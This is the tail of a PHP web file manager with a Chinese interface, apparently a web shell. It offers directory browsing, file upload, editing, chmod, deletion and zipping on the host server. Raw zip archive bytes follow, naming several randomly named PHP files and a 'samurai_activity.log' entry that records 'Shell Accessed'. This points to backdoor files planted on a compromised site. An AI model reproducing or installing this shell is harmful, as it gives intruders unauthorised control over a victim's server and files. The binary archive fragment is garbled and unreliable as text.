<link rel="icon" href="https://v5.bootcss.com/docs/5.3/assets/img/favicons/favicon.ico">
<style>
textarea.form-control { font-family: monospace; font-size: 0.875rem; }
input.form-control-sm { height: calc(1.5em + 0.5rem + 2px); }
</style>
<script>
function confirmDelete(file) {
return confirm("确定删除: " + file + " 吗?此操作不可恢复!");
}
</script>
</head>
<body>
<div class="container mt-4">
<h5 class="mb-3">目录: <?php echo generateBreadcrumb($dir); ?></h5>
<?php if (!empty($message)): ?>
<div class="alert alert-<?php echo $messageType; ?> py-2"><?php echo $message; ?></div>
<?php endif; ?>
<!-- ✅ 已移除“打包当前目录”按钮 -->
<!-- 创建文件/文件夹 -->
<h6 class="mb-2">创建文件/文件夹</h6>
<form method="post" class="d-flex gap-1 mb-3">
<input type="text" name="new_name" class="form-control-sm" placeholder="名称" required>
<select name="new_type" class="form-select-sm" required>
<option value="file">文件</option>
<option value="folder">文件夹</option>
</select>
<button type="submit" class="btn btn-success btn-sm">创建</button>
</form>
<!-- 上传文件 -->
<h6 class="mb-2">上传文件</h6>
<form method="post" enctype="multipart/form-data" class="d-flex gap-1 mb-3">
<input type="file" name="file" required>
<button type="submit" class="btn btn-primary btn-sm">上传</button>
</form>
<?php if ($editFile): ?>
<h6>编辑文件: <?php echo htmlspecialchars(basename($editFile)); ?></h6>
<form method="post">
<input type="hidden" name="edit_file" value="<?php echo htmlspecialchars($editFile); ?>">
<textarea name="content" class="form-control mb-2" rows="12"><?php echo htmlspecialchars($editContent); ?></textarea>
<div class="d-flex gap-1">
<button type="submit" class="btn btn-warning btn-sm">保存修改</button>
<a href="?dir=<?php echo urlencode($dir); ?>" class="btn btn-secondary btn-sm">取消</a>
</div>
</form>
<?php else: ?>
<!-- ✅ zip 表单单独 -->
<form method="post" id="zipForm">
<table class="table table-striped table-hover table-sm">
<thead class="table-dark">
<tr>
<th><input type="checkbox" id="checkAll"></th>
<th>名称</th>
<th>类型</th>
<th>操作</th>
</tr>
</thead>
<tbody>
<?php
$parent = dirname($dir);
if ($parent !== $dir) {
echo "<tr><td></td><td><a href='?dir=" . urlencode($parent) . "'>.. (上级目录)</a></td><td>目录</td><td></td></tr>";
}
foreach ($items as $item) {
$path = $dir . DIRECTORY_SEPARATOR . $item;
echo "<tr>";
echo "<td><input type='checkbox' class='chkItem' name='selected_items[]' value='" . htmlspecialchars($path) . "'></td>";
if (is_dir($path)) {
echo "<td><a href='?dir=" . urlencode($path) . "'>" . htmlspecialchars($item) . "</a></td><td>目录</td>";
} else {
echo "<td>" . htmlspecialchars($item) . "</td><td>文件</td>";
}
echo "<td class='d-flex gap-1 align-items-center'>";
if (is_file($path)) {
echo "<a href='?dir=" . urlencode($dir) . "&edit=" . urlencode($path) . "' class='btn btn-warning btn-sm px-2 py-1'>编辑</a>";
}
echo "<form method='post' action='?dir=" . urlencode($dir) . "' style='display:inline-block'>
<input type='hidden' name='chmod_file' value='" . htmlspecialchars($path) . "'>
<input type='text' name='chmod_mode' value='" . substr(sprintf('%o', fileperms($path)), -4) . "' size='4' class='form-control form-control-sm d-inline-block' style='width:60px'>
<button type='submit' class='btn btn-info btn-sm px-2 py-1'>权限</button>
</form>";
echo "<a href='?dir=" . urlencode($dir) . "&delete=" . urlencode($path) . "' class='btn btn-danger btn-sm px-2 py-1' onclick='return confirmDelete(\"" . htmlspecialchars($item) . "\");'>删除</a>";
echo "</td>";
echo "</tr>";
}
?>
</tbody>
</table>
<button type="submit" name="zip_selected" class="btn btn-dark btn-sm mb-3">打包选中项</button>
</form>
<?php endif; ?>
</div>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js"></script>
<script>
document.getElementById("checkAll").onclick = function() {
document.querySelectorAll(".chkItem").forEach(c => c.checked = this.checked);
};
</script>
</body>
</html>
PK������m\%�~�����������samurai_activity.lognu��[�����������[2026-03-13 08:52:57] IP: 57.141.2.43 | Action: Shell Accessed | Target: 57.141.2.43 | Status: info | UA: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)
PK��������^m\t�J��)���)�� ����������������jimvt.phpnu��[�����������PK��������^m\����������� ������������)*��about.phpnu��[�����������PK��������^m\�.�Q�%���%�� ������������U+��v95wi.phpnu��[�����������PK��������^m\Zh�A
��A
�� ������������cQ��651q2.phpnu��[�����������PK��������^m\
� �m���m��� �������������^��index.phpnu��[�����������PK��������^m\��Wi���i����������������_��index-20260307165838.phpnu��[�����������PK��������^m\5��$*���*��� ������������4`��2pj4h.phpnu��[�����������PK��������^m\�2"� ��� �� �������������`��twkna.phpnu��[�����������PK��������^m\y�������� �������������j��about.PHPnu��[�����������PK��������^m\�rf:/��:/�� �������������k��qavgy.phpnu��[�����������PK��������m\%�~���������������������M���samurai_activity.lognu��[�����������PK����
�
�=��U�����